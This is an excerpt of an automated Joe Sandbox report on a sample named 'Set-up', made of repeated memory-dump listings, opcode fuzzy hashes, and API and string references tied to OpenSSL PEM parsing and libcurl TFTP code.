                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 59421df81c78d6d540ca39e2d4779fe0e9d527c3aab442f8c88aec98e1d2645d
                                      • Instruction ID: 614a4ec6e0f611c0d4174f41b4baab1b34abc22924efcd1b8d8342915c6a5cc5
                                      • Opcode Fuzzy Hash: 59421df81c78d6d540ca39e2d4779fe0e9d527c3aab442f8c88aec98e1d2645d
                                      • Instruction Fuzzy Hash: E0C18B369097119BC714CF18C48026AFBE1FF84324F5A8A6EE8D697355E735EC91CB82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                      • Instruction ID: 19dc1305eca5a7eba69fe1bb40c3ea28c6e5b245e805ab44bcfa461f0b29f03d
                                      • Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                      • Instruction Fuzzy Hash: 5CA18335A001598FDB38DE29CC91FDA77A2FB89310F0A8526EC599F391EA30AD45C781
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 54efff7d06a07863612da3780ee5898bb548389fbe732ba2f8d923066762867d
                                      • Instruction ID: 792ee7070223b0ffd34acd432e85cd44631794c16dd8bb3aac823565b975c1db
                                      • Opcode Fuzzy Hash: 54efff7d06a07863612da3780ee5898bb548389fbe732ba2f8d923066762867d
                                      • Instruction Fuzzy Hash: DAA18E317083199FCB18EE69D89012AB7E1FBD4310F588A3DE8A6D7391D670E954CF82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterFrequency
                                      • String ID:
                                      • API String ID: 774501991-0
                                      • Opcode ID: f65cd8d5b95a3cc3d9ce5ec441d65acb2b7472e8629e3610cf4a5540c3ed6f61
                                      • Instruction ID: 179752a1251469edee29c6176d25fa7cbbfae30f78bef8c72802f18b8209bdd8
                                      • Opcode Fuzzy Hash: f65cd8d5b95a3cc3d9ce5ec441d65acb2b7472e8629e3610cf4a5540c3ed6f61
                                      • Instruction Fuzzy Hash: B8C1D671914B419BD722DF38C881BE6FBE1BFD9300F109A1EE5EA96241EB70B584CB51
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: b4c881841b4b0239f490e47d6ed679a9f65d196450665d9e8a22f166af1012fb
                                      • Instruction ID: f746facd90c7c5ff3f140c7993042233fca6a9c8778165052a0dbc447e0175f9
                                      • Opcode Fuzzy Hash: b4c881841b4b0239f490e47d6ed679a9f65d196450665d9e8a22f166af1012fb
                                      • Instruction Fuzzy Hash: 1A81F572D14B928BD3148F24C8906B6BBA0FFDA314F249B1EE8EA46682F774D590C741
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
                                      • Instruction ID: 426bc05e164f6be0515ca1fa52ae3ee863b92774e559303df3b44cf5d05cfe82
                                      • Opcode Fuzzy Hash: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
                                      • Instruction Fuzzy Hash: 5871E2751082068BC7199F6CD4C8169FBE1FF98354F29CA6DD99ACB346D634EC94CB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                                      • Instruction ID: 1fa1e3687f7303c76eaf35240d7bcd98505faef1411d4fb12e8437fd125caf47
                                      • Opcode Fuzzy Hash: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                                      • Instruction Fuzzy Hash: 7171F4715082168BD719AF6CE5C0169FBE1FF88304F1A8B6ED999C7382D234EC95CB81
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                                      • Instruction ID: a36dde40db2521152e268a10d90a39e201473b0d4878aefb9ecec3a8f880e3ff
                                      • Opcode Fuzzy Hash: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                                      • Instruction Fuzzy Hash: 69513831B093424BD714AE5D84802AEB7D2FBAA324F2947BCD4DA8B342CA20DC07C781
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                                      • Instruction ID: b78495cc4c6ea3bf77c4771af3dccfccc9b443e14c15ec2bd744ab64bd66cf86
                                      • Opcode Fuzzy Hash: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                                      • Instruction Fuzzy Hash: 6B519076A086258BD718AF19C1D0029FBE2FF88304F15C66ED9D9A7785C330AD64DBC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                      • Instruction ID: 4b641157f40a5bab67f04806a49e393719a916f0f3bf8b40ffe34563fc332c31
                                      • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                      • Instruction Fuzzy Hash: 5231C43130871A8BCF18BD6DC8C022AF6D3EBE8750F59863CE589C3380E9718C5886C2
                                      APIs
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 007085B6
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ANY PRIVATE KEY), ref: 007085CC
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PARAMETERS), ref: 007085E2
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X9.42 DH PARAMETERS), ref: 007085F8
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DH PARAMETERS), ref: 0070860A
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X509 CERTIFICATE), ref: 00708620
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00708634
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NEW CERTIFICATE REQUEST), ref: 0070864A
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE REQUEST), ref: 0070865C
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00708672
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 007086A0
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 007086BA
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 007086D0
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 007086E2
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 007086FC
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00708712
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 0070872A
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00708686
                                        • Part of subcall function 006ECBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,006C7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,006C40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006ECBD2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strcmp$free
                                      • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
                                      • API String ID: 3401341699-4246700284
                                      • Opcode ID: 00c6cd22e191d5753dc10ab2871eee52e0aab6158bb48ab67f07ddf13be1d1c5
                                      • Instruction ID: b606d7cfa392b63ca6b4ac7e10f3110fae053672d543554cb3b99089c704391f
                                      • Opcode Fuzzy Hash: 00c6cd22e191d5753dc10ab2871eee52e0aab6158bb48ab67f07ddf13be1d1c5
                                      • Instruction Fuzzy Hash: 51B1FEB1A44303E6DA517A205C03FAB36D86F61B5DF0C052CFA94E12E3FFA9D6158293
                                      APIs
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0058204A
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00582068
                                      • WSAGetLastError.WS2_32 ref: 005820DE
                                      • recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 0058214D
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00582365
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 0058238F
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 005823B9
                                      • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 0058241D
                                      • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 005824AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
                                      • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                      • API String ID: 3302935713-3407012168
                                      • Opcode ID: b371db699d574b014437126079664fe3d35f61164243698628f5e30bf66e1285
                                      • Instruction ID: 9b2af3b3a55d83b30949eb380acfd2920049a7b1bd8a8820d658e6433cda50c3
                                      • Opcode Fuzzy Hash: b371db699d574b014437126079664fe3d35f61164243698628f5e30bf66e1285
                                      • Instruction Fuzzy Hash: 2BE11AB5A04302ABD710BB24DC55B2ABFE4FF94714F084968FC49A72D2EB74E944CB91
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 005BA29A
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 005BA2C5
                                      • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 005BA2E3
                                        • Part of subcall function 005BA5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 005BA5FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
